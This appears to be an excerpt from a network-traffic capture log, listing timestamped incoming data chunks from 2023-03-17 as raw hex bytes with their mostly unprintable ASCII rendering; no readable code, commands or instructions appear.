2023-03-17 13:34:27 UTC	17	IN	Data Raw: 11 d1 0f 7a 92 fd ad ad 41 ff 44 24 c9 ca 4b 29 7d 4a 59 3d 24 6f 0c 56 13 65 e2 3d 19 b6 17 d2 79 b9 64 f3 59 46 de 7b 4f 0d 90 df 6d ac 53 83 63 67 fa bd a4 11 af f7 6b 4b 6c b1 8b 6d df cc b3 ae 93 51 01 12 91 77 bf a6 28 5c fd f3 4f 30 61 c4 3c c9 5e 9d c7 97 df 2b b4 04 d1 ce 35 6a e6 1d 93 bf fc 07 f6 83 65 f3 8a e4 a1 6d 1c 77 3c dc c3 d0 13 ad 40 4e 03 88 0e f4 b0 ea ea 84 90 9c 0c dc 4f f8 df d2 fb 76 af bf 8a 52 59 1f 06 eb 28 7e 69 41 ba 27 08 a3 f6 a0 61 f9 25 ec 02 d0 49 2a a1 5a 36 99 70 9d 2a 7e 0d b7 1a 1e b8 7c 97 65 7f d1 63 18 96 30 24 73 9f 1e 04 bd 24 ef c8 61 06 7a d1 08 7d a4 e9 46 89 54 e6 05 67 b6 d2 48 64 17 c2 bc a8 55 2a 63 9b 46 b2 07 74 26 82 27 c5 56 e2 90 26 fe d0 7a f3 da 8f 00 be 3e e4 8d b0 e6 59 a1 ab bf 8c 1d 56 1f 2a Data Ascii: zAD$K)}JY=$oVe=ydYF{OmScgkKlmQw(\O0a<^+5jemw<@NOvRY(~iA'a%IZ6p~\|ec0$s$az}FTgHdUcFt&'V&z>YV
2023-03-17 13:34:27 UTC	18	IN	Data Raw: f9 2e 50 2f f8 cb 89 fd d1 e9 a8 8c 69 2e c8 57 c8 8b c2 cc bc 55 e2 a3 5c 6f b8 5f b4 e2 10 5a c3 0f cd bc 7e b0 6d 0b f8 ef 0e 44 05 3b 55 80 02 df 0c b6 94 1f 33 43 2b 66 7b 31 3b a2 f4 cf 9c 7b 9e b4 e0 ea 84 55 a7 f1 c2 64 60 74 c6 0b 38 4a 04 54 20 ad 13 74 e8 5f bc 36 b3 ab 15 4a ab af a6 47 73 a3 c3 81 ef d9 ca 33 fd b5 c0 3c 96 bb 96 80 ec 3a 4b 13 3a 8c 14 20 2c 6a 8d 91 39 fc d0 c6 ad 0d 22 b0 88 f2 1c 2a 15 0e 55 0b 6e ab 15 e7 75 a2 ce ae ed 98 2d 39 8b ea 40 c4 d7 0e f9 f1 af 64 2e 16 5f e3 50 c8 42 b9 fd b4 a2 9b d0 55 29 1f c7 08 06 7d 35 93 a0 e8 83 c3 ea b8 f1 96 45 80 90 ce 05 be 66 1c aa 76 42 db 08 10 ae a7 d5 b4 11 37 29 a9 e4 06 14 3d 8f a9 ce de bc 44 80 c7 73 59 01 e6 b9 3d 8a 89 45 ac 40 cd 19 36 e9 21 73 30 f4 06 5f 15 f5 f6 1f Data Ascii: .P/i.WU\o_Z~mD;U3C+f{1;{Ud`t8JT t_6JGs3<:K: ,j9"*Unu-9@d._PBU)}5EfvB7)=DsY=E@6!s0_
2023-03-17 13:34:27 UTC	20	IN	Data Raw: 4d b2 2c 06 b5 82 3a 78 ea 65 4a 27 90 61 9a a1 7f 3c 3b 44 85 45 73 27 b7 6a bd b8 73 9b 17 65 d1 17 18 96 3d 7e 55 8a 1e 7e bd 24 ec c4 fd 13 7a a5 c5 bb bd 97 68 2b 71 fe d5 ba b4 a0 ae c4 3f 31 1e 8d 44 47 66 8d 6e 32 a5 51 30 f0 65 df 5a 92 32 26 f8 d0 7a f3 d1 bb 65 81 3e ee 8b fa 70 2b 80 b2 b3 f4 b5 58 08 52 a6 4a 7e 11 64 12 8a 3f dd 47 08 6f 41 12 d4 4f c6 8f 78 97 15 3f 9c 96 7f 8d 29 f9 52 02 06 fc 55 9d 81 75 e1 9e bf 74 52 04 20 28 ec 73 4e 28 2a 9d 6b ee 38 0a 67 6c e7 e2 0c 03 50 04 68 13 f1 ca 05 99 80 12 19 ac 8c be 5b 97 77 0e 93 55 2a 54 21 4d 8a 72 08 35 0e 5f e5 21 0b d3 b1 13 f4 fe 8c ff 29 e9 75 6c b6 59 6f 62 ce 63 b0 83 fb ba da 80 76 ed d8 4d d1 fd 51 71 78 c2 e8 2e da 03 9a 4e a1 c7 8e 8d 53 46 c6 2f bb 74 c7 1a 03 29 be 46 5f Data Ascii: M,:xeJ'a<;DEs'jse=~U~$zh+q?1DGfn2Q0eZ2&ze>p+XRJ~d?GoAOx?)RUutR (sN(k8glPh[wUT!Mr5_!)ulYobcvMQqx.NSF/t)F_
2023-03-17 13:34:27 UTC	21	IN	Data Raw: 66 b4 26 d8 98 5d 4a 4d ea 40 fe f9 92 da f1 a5 64 3f 10 30 b6 10 93 60 36 f7 c6 be 39 dc 2d 7f 8d c7 08 08 46 77 82 a4 e8 da 27 fa 92 81 e5 83 9b a0 c6 6a 55 66 1c a0 6f 3c fc 19 10 aa fc 29 b4 11 3b 2d cd 62 25 14 37 8b f3 ca dc bc 32 f9 16 13 59 0b ec 71 cc ae b2 7d bd 4c eb 1f 27 ca 66 1c f9 fe d8 55 15 df dc 04 a1 11 04 48 8a 17 0d 94 e4 37 d7 e1 82 37 09 14 b5 7e a4 d4 44 88 18 ee b9 03 97 3d 1b 9d 85 05 1f a6 6a 94 96 22 48 93 fe fc 6a 47 9d da d6 29 3e 65 aa 64 fd b2 d9 74 10 20 91 33 b5 5f 9f 0a da 2c 32 83 f7 bb d9 b8 fd 44 35 c9 ca 60 3b 7d 5b 42 2b 4b 8e 3b 56 19 63 e2 f2 1c ed 16 e6 79 bd 46 33 59 6e 84 14 84 07 4e d5 6d 97 59 fc 56 67 fa b9 da 36 af fe 65 38 db f5 8b 67 b1 13 83 ad 99 b0 10 18 80 5f d0 6b 39 5c 89 d2 5e 37 0a 78 44 d2 54 ed Data Ascii: f&]JM@d?0`69-Fw'jUfo<);-b%72Yq}L'fUH77~D=j"HjG)>edt 3_,2D5`;}[B+K;VcyF3YnNmYVg6e8g_k9\^7xDT
2023-03-17 13:34:27 UTC	22	IN	Data Raw: 50 dc 72 4f 0c 07 9d 6b ee 4a 4c 60 6c 95 8e b4 00 50 00 63 1d e7 b2 03 8a b0 13 31 f9 8c be 5d ff c2 0e 82 5f 5a a0 01 4d fa 50 67 37 0c ab 9d b1 0b d3 b3 48 07 fe 8c f3 2a d7 75 6c b6 73 25 6f cc 12 21 97 ef aa 8c 37 77 ed d8 2f 86 6a 51 70 75 bf db 5c 5e 11 98 45 fa 70 8e 89 27 47 c0 51 9b 5c c5 1f 7d 08 b4 40 77 29 83 59 ef 76 08 57 ce b9 a0 51 ea 86 3b 2b 17 be 81 eb a3 82 b2 1b b2 aa a7 9b a3 15 73 27 2d 91 c9 44 cd 9e e6 96 11 9d d4 18 7b 6e 45 a6 14 6b 04 39 69 d0 96 d0 48 4d 5a 8c aa 04 3d 6f a0 00 e0 29 86 e8 fa 69 d5 9a 10 e3 fa 24 a7 ee c8 8b e3 ff a9 73 89 62 5c 6f 4c 20 8f e6 01 5a 80 eb cf c7 4c b0 7c 09 99 64 09 41 59 0b f4 85 00 d0 34 10 87 55 6b ca 44 66 7d 48 c0 60 f4 c9 f9 e8 8f b2 94 bc 9e 55 d7 db 09 50 60 7e b0 92 2b 4f 5c e4 4f ad Data Ascii: PrOkJL`lPc1]_ZMPg7H*uls%o!7w/jQpu\^Ep'GQ\}@w)YvWQ;+s'-D{nEk9iHMZ=o)i$sb\oL ZL\|dAY4UkDf}H`UP`~+O\O
2023-03-17 13:34:27 UTC	23	IN	Data Raw: 46 b5 80 ab 66 34 bb ae 60 c1 b0 a3 2b 10 20 95 31 cf 0f 96 00 de 0b 66 82 f7 b0 c2 88 ff 41 3a 37 c9 6c 2a 6e 5e 42 2e 67 ef 0e 53 97 0c 9f 7e 13 c8 3a d0 7b c6 1e 39 59 42 fc 1b 85 0d 9a a8 3c bd 59 f9 43 71 f8 c2 8b 37 af f3 6d 43 86 b1 8b 63 98 10 b2 ae 93 51 12 1d 0e 19 ad 3f 28 5c f3 f1 5c 4c 5a 0a 3c cd 7c 92 b4 bc d4 56 97 84 dd ca 35 6e 12 0d b6 97 db 37 f4 89 ec ff 8a cc c6 6d 1c 6c e2 de b8 9d 13 d3 5c 30 02 8d 7c 04 8e fb 9b 92 b2 f6 0a cf 41 ff 25 ff e5 79 c5 ff b3 a8 5d 37 14 ea 35 f9 56 41 ba 24 56 e4 84 10 7c 87 54 4f 27 cd 49 8b a0 5a 36 30 52 96 5d ef 1d 9b 67 be e6 34 e9 41 7b f9 75 bb b3 20 56 e5 8a 1c 0f 50 01 f4 b2 03 07 7b d5 6d b6 b5 e8 4c 21 7d f2 64 99 bf d4 14 cb 3d 3a f3 a8 5f 3d 45 9f 6f 36 0d 74 2c 82 05 be 09 e2 90 0a 05 d1 Data Ascii: Ff4`+ 1fA:7l*n^B.gS~:{9YB<YCq7mCcQ?(\\LZ<\|V5n7ml\0\|A%y]75VA$V\|TO'IZ60R]g4A{u VP{mL!}d=:_=Eo6t,
2023-03-17 13:34:27 UTC	25	IN	Data Raw: 7e 77 65 0c 7f 38 26 38 69 de 9b d0 75 56 dd e7 79 43 3f 6a ea 39 4a 3e 50 fd 82 ec de 8b 1c 02 00 da a3 fb c7 9a c7 e1 17 5b 87 48 5c 69 98 21 8f d2 14 5e e5 ce cd bc 74 b0 7c 0d 95 6a 95 1e 75 13 e4 a5 d2 4a 7e 12 86 37 55 6a 44 6c fb 65 54 60 f0 d5 1b 21 8f b2 93 99 87 4b 4b 59 2d 64 60 7a ab 8b 07 5d 75 7c 45 2d 73 7e 87 98 ce 1d b8 ab 4d a1 c8 af a0 50 62 0b cb 81 ef db cf bb 89 b2 b3 fc bc bb 9c 93 fe 1b 47 60 52 8c 14 2a 01 60 9c 86 56 4a c8 c7 a7 16 21 ea 49 e9 1c 5c 61 05 3a 12 6b 83 59 f1 8b aa b7 4d c2 14 5d 4a 4d ec 2f d4 b9 c9 f3 fd 8e 06 2d 12 18 3d 51 c8 42 a5 ea 4b 8b 80 d0 24 72 04 b5 97 22 55 03 31 85 f5 f8 48 ec b9 81 e3 21 a5 88 b6 71 58 66 6c 02 53 25 f5 67 1c ab d4 1b 16 34 27 48 93 bb 25 64 9f ae c0 f7 b3 b2 35 96 e9 b1 7c 1d 9e ec Data Ascii: ~we8&8iuVyC?j9J>P[H\i!^t\|juJ~7UjDleT`!KKY-d`z]u\|E-s~MPbG`R*`VJ!I\a:kYM]JM/-=QBK$r"U1H!qXflS%g4'H%d5\|
2023-03-17 13:34:27 UTC	26	IN	Data Raw: c5 0e dc 45 11 23 d3 e8 75 be b2 b3 a8 59 1f 06 f8 05 f5 56 0c ba 26 2d f5 84 10 69 f9 57 c0 4e df bb 8d 77 d7 66 3b 55 84 54 fc 0f bf 7c be 13 0c fe 9b 57 c4 66 ba b9 2a 7e 6c 8a 1e 7e 17 15 e2 9e 58 07 7a df 08 1c a4 e9 46 20 76 ec 5f be af d2 32 ee 1d 40 bc a2 2d 12 6c 8d 1e 59 a8 74 2c 88 0c c2 50 c9 90 08 51 d0 7a f9 c1 a3 8b 81 f7 e7 8c 95 b1 2b 80 a9 bf fc cd 18 2d 54 fc 62 06 21 6d 18 3b 3a d1 51 2e 44 67 0b dd ab cd 8b 78 82 63 66 eb 96 0f 91 01 47 42 27 24 de ab 9c 81 60 dd 8e 96 24 52 10 fa 9d ec 73 4f 09 10 4b 66 ed 42 c2 18 92 93 e6 87 11 56 29 a7 16 6f a7 29 99 a8 ed 31 a8 86 be 23 de c3 0e 99 2d 23 ad 3b 3d 95 47 66 35 04 27 b0 10 0b a3 da 1b a0 fe 86 9a 69 e4 75 66 b9 76 3d 10 27 4c 12 e7 80 89 f3 36 7c 82 fa 38 ae f7 23 30 62 c2 9f 2e 75 Data Ascii: E#uYV&-iWNwf;UT\|Wf*~l~XzF v_2@-lYt,PQz+-Tb!m;:Q.DgxcfGB'$`$RsOKfBV)o)1#-#;=Gf5'iufv='L6\|8#0b.u
2023-03-17 13:34:27 UTC	27	IN	Data Raw: 1a d0 c6 a7 1c 2b c2 8a a9 47 72 f5 03 55 01 dd 90 55 f1 66 af ad 4c ec 42 4a 9c c0 b8 40 ce b9 da f1 e0 a3 73 e5 03 3d 30 43 c6 63 89 e6 ce a5 8e d3 34 50 0a a8 27 03 55 79 8c b0 ca df 26 fc b2 1f f4 84 98 46 d7 6d 68 68 0b 76 65 32 ed 06 01 a7 e5 c4 a5 19 b3 53 b5 40 32 c2 b0 d9 db fe dd af 3d 87 e6 05 48 09 fa 3b d2 8f fb d7 ac 44 f6 04 2e f5 27 14 77 9d 11 8f 3d 66 dd 14 ab 11 2f 7a 83 99 7e 97 3c 2f 49 f6 54 bb 40 24 b7 7f ac db 4c 9e 10 e1 af 1a 19 54 1b 38 85 05 13 a6 bc 8d a2 05 74 1d 97 fe ee 2e 9d 19 d6 29 3e bb bb 6b db b2 c9 6c 9e 49 99 bd dd a1 94 13 ca 32 66 ae 48 ab ca 06 96 53 f4 de 1c ed 70 7d 5b 52 38 41 b7 04 d8 70 72 38 3f 02 df 2d c0 52 a4 5d 33 48 54 c3 ce 95 05 81 c7 f9 b5 48 ef 51 bd 6e d8 44 26 bd e0 b9 2b c6 a0 99 76 a1 31 52 bf Data Ascii: +GrUUfLBJ@s=0Cc4P'Uy&Fmhhve2S@2=H;D.'w=f/z~</IT@$LT8t.)>klI2fHSp}[R8Apr8?-R]3HTHQnD&+v1R
2023-03-17 13:34:27 UTC	28	IN	Data Raw: 96 0f 91 17 67 51 5d 1f e6 ba 90 a7 3e c5 03 81 74 52 11 d5 55 9e 32 67 00 77 3f 4e f3 43 ee 54 74 e5 4e a9 00 20 a6 4c 2f f6 b0 8b bc 9a 64 00 89 8c ce ff dd d9 1f 96 fd 7d 94 49 0e db 5a 17 97 26 d6 9b 11 01 c0 b8 45 aa fe 8c f1 46 e9 5d 2a b2 71 30 e2 c5 69 12 93 ef ae e3 31 61 3b c1 3e bf fa 40 76 4d 22 11 a3 a1 15 9a e0 de 55 a6 b9 59 46 cb 42 9f 74 ef 4e 7d 02 b4 98 5b 28 a9 18 f1 5e ab 57 ce bf a0 68 ea 86 3b 6f 26 bb 81 00 a2 82 b2 39 b2 aa b6 df a0 03 8c 3d 16 92 e5 5c c8 be e6 d2 11 9d 3b 19 68 7a 41 95 17 10 39 4b a2 fc 9b a9 4c 1c 53 8e a5 44 3f 6c 99 37 40 29 80 e5 8e 8f 34 bd 16 fc 06 3e a6 e8 ce ad ce e4 c8 53 8d 69 50 67 8b 12 9d e2 10 59 c3 d5 cc bc 72 a7 a6 1e 8c 77 0b 43 4d 04 e4 80 02 d2 6f 15 f0 f0 64 6b 34 09 66 3a 54 66 f9 c8 87 7c Data Ascii: gQ]>tRU2gw?NCTtN L/d}IZ&EF]*q0i1a;>@vM"UYFBtN}[(^Wh;o&9=\;hzA9KLSD?l7@)4>SiPgYrwCModk4f:Tf\|
2023-03-17 13:34:27 UTC	29	IN	Data Raw: 9c 92 13 97 4d 25 83 e5 05 19 ac a2 65 b0 55 6f 9f ef fa 4c 0a a8 07 e9 29 34 ba 8f 72 a5 dd f2 64 60 82 b4 24 bd fd b3 18 a8 98 5e 83 87 18 e7 91 ee 40 8c ec d0 12 13 5c 5b 23 89 6e bd 1d 53 bb 40 fe 5e 50 e9 3e a2 db 95 cf 39 59 4c c7 19 fa 06 90 d5 69 ac 54 d5 00 67 fa b3 5a 3c af f7 6b 38 d4 a0 8c 70 66 13 b4 bf 9e 40 16 26 60 8e 2f 94 28 5c 29 e3 7b 1f 3a 0a 3c c3 47 93 b5 94 8e 2b c4 8e 03 ce 35 44 79 11 b6 97 c8 07 f6 89 65 ff 8a cc a6 6c 1c 7d 88 dd c3 d0 03 d3 58 4e 47 8c 7c 0f bd da 9e 92 c4 fd 0c dc 00 ee 21 c2 e8 64 a2 9a a4 a9 59 15 74 04 1f f3 26 69 fc 26 2d bf 8e 10 7e 8a 4a 4f 27 c1 6a 9d d3 bb 1b 3b 25 ea 42 ff 18 b1 4c ba b5 00 e9 41 75 dd 6f 83 80 2b 56 e5 8d 71 6f 1e 01 f2 a1 a7 15 7c c3 74 99 9c fe 4d 2b 71 fd 66 98 dc 3d 1f c6 4f 2e Data Ascii: M%eUoL)4rd`$^@\[#nS@^P>9YLiTgZ<k8pf@&`/(\){:<G+5Dyel}XNG\|!dYt&i&-~JO'j;%BLAuo+Vqo\|tM+qf=O.
2023-03-17 13:34:27 UTC	31	IN	Data Raw: b2 aa bc 8d 5e 00 9c 23 54 bd e4 20 b9 a8 ce f7 11 9d 20 0f 89 65 36 91 1a 01 3f 15 24 c9 16 e6 64 5a 52 ab b9 3c c8 46 ea 58 e3 0c 91 e7 2b d8 cd e8 ad a4 69 54 05 cd d1 9a cc 6e 88 49 ff 52 7d 6f c2 83 b9 f9 01 5b 0e eb d1 ce 37 91 7c 7d 28 49 9b 44 75 19 f6 8d 7c de 7e 12 86 0e 4e 43 02 66 7b 31 d4 6b f4 cf 92 7b 8f a3 95 ab 48 46 d0 c8 75 75 66 40 54 6f d0 b5 74 7c 91 bd 36 56 b3 9c bc 3c aa a5 3d 09 fb af a0 5e aa 8b af ab ae c3 d9 3b ec b2 b3 f8 85 bb 9c 93 b2 2a 43 60 94 8d 14 2a 2f 60 9c 97 12 39 d0 c7 bc 2c 2f c2 f6 e8 1c 5a 2e 03 55 1a 6a 9c 4f cf 62 a9 bc 40 89 e4 70 4a 3d c2 06 ce b8 c3 f3 f1 a3 17 20 11 30 20 5b cf 3a 49 d0 c6 c4 ef ca 24 57 14 e1 0e 2a 30 73 93 aa ee f9 1e cf b9 81 e5 84 ef 8b c5 6a 7f 71 c6 b3 70 2a ef 0f 28 bd d5 1d b4 16 Data Ascii: ^#T e6?$dZR<FX+iTnIR}o[7\|}(IDu\|~NCf{1k{HFuuf@Tot\|6V<=^;C`/`9,/Z.UjOb@pJ= 0 [:I$W0sjqp(
2023-03-17 13:34:27 UTC	32	IN	Data Raw: 68 1c 6c e6 ae e8 d1 13 a3 4e 66 63 8c 7c 04 b0 14 99 83 bd 8e 27 dd 45 9e 37 fb 88 7b be b8 a5 56 5a 40 15 e7 24 ff 7a 0c a7 ab 12 b5 84 11 5d ef 27 9f 08 c7 11 38 84 4d 35 99 70 9d 2a 45 30 b7 1a 1e b8 7c f8 45 dd f4 7d c8 82 0b 56 95 28 3b 6f 0e 04 56 93 61 74 39 f4 67 ee 06 c1 cf 2b 71 f0 64 92 d0 d9 38 c6 3b 50 b1 80 19 39 6d 87 ee 3d 07 74 28 82 07 d4 5d f5 46 1d 7c c1 7d e8 dc ad 6d 7f c1 1b 8c 95 2e 3b a5 90 8b fc bf 79 1b 5a 8c 62 35 21 6d 18 ef 3c dd 6d 62 73 41 03 d4 31 de 8f 6b 93 67 09 dd 97 0f 9b 6b 98 52 02 1c ea ab 9c cf 73 d8 8f a5 44 56 10 8c 42 ec 73 0a 00 07 8c 6b fb 56 64 66 6d 97 ff f3 4d 60 04 19 1e a1 b4 29 93 8a 16 37 db 93 bf 5d fe c9 09 e1 be 7f 88 4b 22 e0 5b 67 33 28 53 b3 74 0b d3 bf 37 a9 c7 bf f4 57 e4 72 03 a9 70 3a 64 d9 Data Ascii: hlNfc\|'E7{VZ@$z]'8M5p*E0\|E}V(;oVat9g+qd8;P9m=t(]F\|}m.;yZb5!m<mbsA1kgkRsDVBskVdfmM`)7]K"[g3(St7Wrp:d
2023-03-17 13:34:27 UTC	33	IN	Data Raw: b2 b9 d0 63 bb 9c 95 f6 2e 43 71 fa fe 3f 2b 3f 10 8a bf 36 39 d0 cc b1 e2 28 d3 8f 9b 37 5b 6b 73 43 23 0a 83 53 ed 63 56 bf 15 e8 94 4c 46 61 a7 5d 43 87 c9 f9 f0 80 72 4d 63 02 26 20 6a 6d bf fe 64 91 98 a2 9e 7f 12 b7 aa 27 4c 62 97 02 c7 eb 55 cd 99 81 95 21 a5 8b d5 6f db 43 00 d2 35 1d fc 78 b2 82 57 1d b4 1b 2e 37 Data Ascii: c.Cq?+?69(7[ksC#ScVLFa]CrMc& jmd'LbU!oC5xW.7
2023-03-17 13:34:27 UTC	33	IN	Data Raw: dc 91 25 14 39 9a d6 d6 9a bc 34 9c 6f 18 59 01 e8 af c3 9a 9d 5e 6b 5f e6 04 20 f3 30 22 19 0a f9 aa 15 f5 03 04 84 39 30 48 8b 1d 04 81 e4 10 c3 e1 82 3c cc 24 b7 54 fe c8 44 88 01 ee b9 12 84 3d 33 ab d2 04 19 a6 de 9a b3 0a 6c 93 fe f6 24 47 b5 8b cd 19 30 bb d6 65 d7 b2 9d 64 10 31 91 2c a8 77 81 01 da 29 04 6c c5 ba b2 a0 b9 44 2e c3 c0 60 24 0e 44 52 2b 4d ad 0b 24 f8 42 e2 5c 7c d2 3f d2 7f 9b 4a 11 3c 46 d4 1e 88 05 a9 e6 6c bd 59 fa 29 7c fb b9 dc 20 75 e4 69 2e c7 b6 b3 70 b1 00 b3 a9 88 56 62 f7 a7 70 a0 04 35 5d f7 f5 53 30 1f 0d 4e cc 7c 9d c5 d3 c3 2a c4 82 ce ca 32 7f 3f 7f 95 bf c8 77 99 94 77 ff 8c df f4 7c 19 55 25 dc c3 d6 00 db 49 46 2f cf 7a 26 9d eb 9a 98 d7 c0 0d dc 4f 81 cc d3 e8 71 96 7a b3 a8 5f 0c 0f fa 3c e7 a8 40 a9 2c 3c bf Data Ascii: %94oY^k_ 0"90H<$TD=3l$G0ed1,w)lD.`$DR+M$B\\|?J<FlY)\| ui.pVbp5]S0N\|*2?ww\|U%IF/z&Oqz_<@,<
2023-03-17 13:34:27 UTC	34	IN	Data Raw: 35 c7 2d f2 36 7c fe df 47 a5 fd 51 74 62 cf c7 1a 5e 15 90 be c5 70 8e 89 59 46 d0 56 86 a2 d4 19 6c 05 af 40 65 c8 7d a6 12 5e ab 89 de 9a 88 4f ea 86 31 2b 29 bb a9 3a a3 82 b8 f7 b2 aa 9c da bc 03 8d 26 26 96 e5 33 c9 be e6 c0 10 9d 2a 73 76 66 69 92 16 10 33 7d 69 d4 9a c2 54 5e 53 f2 ae 4e 3f 2f ea 28 50 29 99 f2 a1 ea d4 9a 1c fe 02 11 a7 98 e0 cd c8 cc a7 59 8d 65 2f 70 b3 21 9a e9 17 2c 4d e9 cd cc 1b aa 7d 0d 8c 47 1e 6c 10 13 e5 8a 0e dd 47 21 83 1f 43 6c 2b 7d 7a 3b 52 77 2e dc 90 6d 9c b5 aa ab 9f 55 d7 de 63 63 12 91 93 91 5f 25 69 7d 4f ab 1e 79 96 9b ce 33 91 ab 4d 4e b6 ae a0 52 67 8f a8 90 e8 ad fa 13 ec c2 dc e5 97 bb 9a 80 e0 3a 46 48 39 8c 14 2c 2c 68 8d 9f 7a 7a d6 ee 9c 1d 2b c8 e5 d5 1d 5a 61 6c b8 0b 6a 89 7b 2f 75 a8 ba 59 f2 89 Data Ascii: 5-6\|GQtb^pYFVl@e}^O1+):&&3*svfi3}iT^SN?/(P)Ye/p!,M}GlG!Cl+}z;Rw.mUcc_%i}Oy3MNRg:FH9,,hzz+Zalj{/uY
2023-03-17 13:34:27 UTC	36	IN	Data Raw: e4 42 e6 cb 99 16 af 87 cd 10 57 b1 8b 6d a3 0d cd a5 99 51 14 09 8d 58 96 6b 28 56 77 f8 5e 37 0a 0a 3c d8 53 8a 63 af d9 3a c3 95 db f0 d5 90 c7 f2 b6 97 16 17 d3 a1 42 ff 8a c6 e2 63 1c 55 b2 dc c3 da cd d3 58 64 42 90 7c 0e a6 ea 9a 92 ab fc 0c dc 12 ef 21 d3 82 7a be b2 a3 a8 59 1f 42 eb 35 f2 4d 71 be 26 51 b4 84 10 3d f9 55 5f 27 d8 7d b2 b6 5b 3c 31 27 4c 6f fe 68 9f 2c bc 9d 6f e3 41 79 a2 78 bb b3 2c 5d e2 f8 ff 53 1f 71 9b ac 7c 06 7c f3 61 b6 c1 e9 4c 21 7d f2 4e ac af d2 38 c1 50 5a bd a8 59 2e b7 9e 68 20 14 73 14 95 06 c5 5a e5 81 09 09 3f 5d f9 aa fc 90 80 3e e2 81 92 e1 2c f2 bd 97 fc cf 1c 15 55 8c 4c 76 25 6a 03 36 4e fe 6f 23 1f 2e 1e d5 31 d8 9c 7d 82 62 21 4d 96 0f 9d 12 91 43 0a 20 a9 ad b4 b0 72 d8 84 d1 48 53 10 fa 2c 01 73 4f 0a Data Ascii: BWmQXk(Vw^7<Sc:BcUXdB\|!zYB5Mq&Q=U_'}[<1'Loh,oAyx,]Sq\|\|aL!}N8PZY.h sZ?]>,ULv%j6No#.1}b!MC rHS,sO
2023-03-17 13:34:27 UTC	37	IN	Data Raw: 23 d5 0e b0 a7 04 52 6e e6 43 67 49 17 41 f4 bf 34 53 0c b2 92 b6 8d 58 a9 d2 72 64 64 6f b9 b9 69 4a 74 76 cf a6 13 7e 83 9c bc 27 be bc eb 32 ac be a7 45 72 b5 4f 7f 10 20 d9 3b 32 a2 96 d0 a2 bb 9c 99 f6 25 43 48 ae 8c 14 20 e1 60 9c bd 17 25 d0 c6 a7 1c 2b c2 99 e9 1c 5a 3c 02 55 0b 00 82 53 e7 65 a8 bc 4a bf 98 5d 4b 56 da 44 ce c4 c8 f9 f1 e0 64 3f 01 30 39 4c e0 5f a9 f7 cc c6 59 e9 25 27 3a 81 08 02 5f 79 93 a6 91 ee 26 fc be 8a e2 f1 61 b7 c4 1a 16 7c 1d a0 70 1a fa 20 75 aa d4 17 b8 19 04 09 a3 9a 25 13 52 90 da fe da ab ee 85 e9 05 4a 06 d4 b8 c2 8b 9a 4e ac 4b 93 fa 00 e2 46 73 e4 f5 06 53 18 f2 cc 13 d3 14 2c 48 fb 78 0a 8e e4 3e 80 e5 85 27 15 56 94 56 bf a4 2b 95 00 ee bf 01 92 2c 36 83 42 05 19 a0 a7 93 a2 02 50 d0 f8 de 5b 46 b5 80 b9 15 Data Ascii: #RnCgIA4SXrddoiJtv~'2ErO ;2%CH `%+Z<USeJ]KVDd?09L_Y%':_y&a\|p u%RJNKFsS,Hx>'VV+,6BP[F
2023-03-17 13:34:27 UTC	38	IN	Data Raw: 63 c4 63 3c 81 f3 3e 1a 50 fa 07 3d 8b c9 29 c3 9d 64 a0 da 1c 18 6d fd cc 1e 84 74 2c 88 14 c8 24 e9 90 0e 7f c1 77 d1 9c 93 8d 8b be ef 8c 95 f4 2b 80 a9 b8 eb 69 60 0f 45 8b 5b 63 1f 8d ec ce c3 dd 47 fd 7f 64 2b e0 31 de 85 6b 9d 67 21 da 96 0f 91 df 99 52 28 4d f6 ab 9c 8b 73 d8 8e ad 74 52 10 a7 42 ec 73 25 01 07 9d 7b e4 4a 4c 35 6c 97 f4 9a 30 54 04 15 37 e7 b4 6c 99 80 07 31 b7 90 96 4a f9 c2 04 e1 68 64 88 4b 65 bc 5a 67 3f 04 55 9d 62 14 d2 b5 3d aa f9 fe 14 70 e4 05 03 a8 70 3a 64 e8 6f 3a f2 ef ae f8 3a 7e d4 e1 38 ae fd 56 1f 68 c3 ef 5a 49 cf 89 38 d8 63 89 b5 4e 47 c1 51 96 65 c0 6c 92 25 be 36 34 35 82 59 eb 53 ac 46 c9 cd a5 53 ea f6 54 25 26 bb 87 79 a7 85 a3 2e c0 89 9e 9b d0 6c 90 27 26 90 f6 25 d8 bb ce 50 11 9d 2c 0a 7f 77 61 ae 55 Data Ascii: cc<>P=)dmt,$w+i`E[cGd+1kg!R(MstRBs%{JL5l0T7l1JhdKeZg?Ub=pp:do::~8VhZI8cNGQel%645YSFST%&y.l'&%P,waU
2023-03-17 13:34:27 UTC	39	IN	Data Raw: 98 e2 7f 42 79 16 be 85 6f 2d f8 aa 35 b0 a6 2c 95 11 4d 98 87 81 34 11 9f ae c7 8c 9f 9d 34 e6 4d 3b da 01 ec a5 d0 86 e4 42 bd 4c e5 04 2a ca 70 1c f9 fe 86 5e 15 f5 d9 14 a1 00 03 5f 5d 04 10 9e e3 29 95 df 62 c8 ed db b7 7e 61 c4 61 a0 35 ee b9 18 84 33 33 83 d5 05 19 ac 6a 9b b3 20 3d 8f fe f6 60 47 b5 8a c5 29 34 bb fd 65 d7 b2 b2 65 10 20 81 33 b4 5f d2 00 da 22 6d b3 f3 ba be 89 ff 44 6b c9 ca 71 22 62 47 7b 3c 4a a6 06 24 b1 5b e2 5c 3b 8e 3e d2 73 b7 4c 3f 2a 59 d5 14 82 06 97 a7 8c 9a 59 8d 29 7d fb b9 dc 11 a9 df 0a 38 d4 bb 87 6f 89 33 b2 ae 99 56 7f 03 81 70 d6 7c f2 4f f1 e5 4d 30 36 1d 3d c9 54 9a a4 bb ac c4 e3 84 ad a1 28 6f 38 0b bb 90 d9 00 84 8c 5e ff fa a3 ec 6c 1c 7b f1 d8 c4 c1 14 a1 7b 66 03 fc 13 13 a7 ea 9c 81 bd ed 09 f4 82 ee Data Ascii: Byo-5,M44M;BLp^_])b~aa533j =`G)4ee 3_"mDkq"bG{<J$[\;>sL?YY)}8o3Vp\|OM06=T(o8^l{{f
